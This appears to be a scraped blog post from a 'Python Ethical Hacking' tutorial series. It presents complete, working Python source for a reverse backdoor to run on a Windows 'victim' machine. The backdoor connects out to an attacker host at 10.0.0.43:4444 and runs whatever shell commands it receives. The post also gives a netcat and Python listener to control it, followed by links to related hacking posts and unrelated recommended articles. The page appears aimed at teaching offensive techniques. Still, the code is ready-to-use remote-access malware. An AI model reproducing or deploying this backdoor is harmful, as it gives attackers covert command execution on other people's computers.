REVERSE_BACKDOOR

  • Access file system.
  • Execute system commands.
  • Download files.
  • Upload files.
  • Persistence.

BACKDOORS

An interactive program gives access to a system its executed on.

  • Command execution.
  • Access file system.
  • Upload/download files.
  • Run keylogger.
  • ...etc

Write the Reverse backdoor Python script and execute on Windows machine. (Victim machine)

#!/usr/bin/env python

import socket

import subprocess

def execute_system_command(command):

    return subprocess.check_output(command, shell=True)

connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connection.connect(("10.0.0.43", 4444))

connection.send(b"\n[+] Connection established.\n")

while True:

    command = connection.recv(1024).decode()

    command_result = execute_system_command(command)

    connection.send(command_result)

connection.close()

Run the listening progress on the Kali Linux to establish the connection and execute the system commands.

nc -vv -l -p

Write and execute the Python Listener:

#!/usr/bin/env python

import socket

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

listener.bind(("10.0.0.43", 4444))

listener.listen(0)

print("[+] Waiting for incoming connections")

connection, address = listener.accept()

print("[+] Got a connection from " + str(address))

while True:

    command = input(">> ").encode()

    connection.send(command)

    result = connection.recv(1024).decode()

    print(result)

Python Ethical Hacking - BACKDOORS(1)的更多相关文章

  1. Python Ethical Hacking - BACKDOORS(8)

    Cross-platform hacking All programs we wrote are pure python programs They do not rely on OS-specifi ...

  2. Python Ethical Hacking - BACKDOORS(3)

    BACKDOORS Sockets Problem: TCP is stream-based. Difficult to identify the end of message/batch. Solu ...

  3. Python Ethical Hacking - BACKDOORS(7)

    Handling Errors: If the client or server crashes, the connection will be lost. Backdoor crashes if: ...

  4. Python Ethical Hacking - BACKDOORS(6)

    File Upload: A file is a series of characters. Uploading a file is the opposite of downloading a fil ...

  5. Python Ethical Hacking - BACKDOORS(5)

    File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read th ...

  6. Python Ethical Hacking - BACKDOORS(4)

    REVERSE_BACKDOOR - cd command Access file system: cd command changes current working directory. It h ...

  7. Python Ethical Hacking - BACKDOORS(2)

    Refactoring - Creating a Listener Class #!/usr/bin/env python import socket class Listener: def __in ...

  8. Python Ethical Hacking - ARP Spoofing

    Typical Network ARP Spoofing Why ARP Spoofing is possible: 1. Clients accept responses even if they ...

  9. Python Ethical Hacking - NETWORK_SCANNER(2)

    DICTIONARIES Similar to lists but use key instead of an index. LISTS List of values/elements, all ca ...

随机推荐

  1. 兄弟打印机MFC代码示范

    m_strModel.LoadString(IDS_MODEL_STRING); //IDS_MODEL_STRING,字符串控件的ID,资源视图-String Table里面设置 m_strSour ...

  2. Linux监控CPU,内存,磁盘I/O

    简单讲讲Linux下监控 [CPU] 监控CPU,top命令能够实时监控系统的运行状态,并且可以按照CPU.内存和执行时间进行排序,同时top命令还可以通过交互式命令进行设定显示,通过top命令可以查 ...

  3. Task.Result跟 Task.GetAwaiter.GetResult()相同吗?怎么选?

    前几天在用线程池执行一些任务时运到一种情形,就是回调方法中使用到了异步方法,但是回调方法貌似不支持async await的写法.这时候我应该如何处理呢?是使用Task.Result来获取返回结果,还是 ...

  4. 使用IntelliJ/Eclipse生成类图

    IntelliJ可以安装一个免费的pugins - Code Iris. PlantUML 在Eclipse中 - ObjectAidPapyrusEclipse Modeling Tools 查看原 ...

  5. 专家解读:利用Angular项目与数据库融合实例

    摘要:面对如何在现有的低版本的框架服务上,运行新版本的前端服务问题,华为云前端推出了一种融合方案,该方案能让独立的Angular项目整体运行在低版本的框架服务上,通过各种适配手段,让Angular项目 ...

  6. 人脸识别Demo解析C#

    概述 不管你注意到没有,人脸识别已经走进了生活的角角落落,钉钉已经支持人脸打卡,火车站实名认证已经增加了人脸自助验证通道,更别提各个城市建设的『智能城市』和智慧大脑了.在人脸识别业界,通常由人脸识别提 ...

  7. redis高级命令4 持久化机制 、事务

    redis的事务是支持很简单,基本没有啥用我们来看下面的列子 我们开启一个事务,在事务中执行了age 加1,set a4 ,还有对一个字符串进行加一,对字符串加1导致了事务失败,按道理incr age ...

  8. 【Spring注解驱动开发】关于BeanPostProcessor后置处理器,你了解多少?

    写在前面 有些小伙伴问我,学习Spring是不是不用学习到这么细节的程度啊?感觉这些细节的部分在实际工作中使用不到啊,我到底需不需要学习到这么细节的程度呢?我的答案是:有必要学习到这么细节的程度,而且 ...

  9. keras中loss与val_loss的关系

    loss是训练集的损失值,val_loss是测试集的损失值 以下是loss与val_loss的变化反映出训练走向的规律总结: train loss 不断下降,test loss不断下降,说明网络仍在学 ...

  10. 一.5.序列化应用之服务器制造厂与型号app功能

    1.环境准备: (python36env) [vagrant@CentOS7 apps]$ django-admin startapp manufacturer (1)激活:'manufacturer ...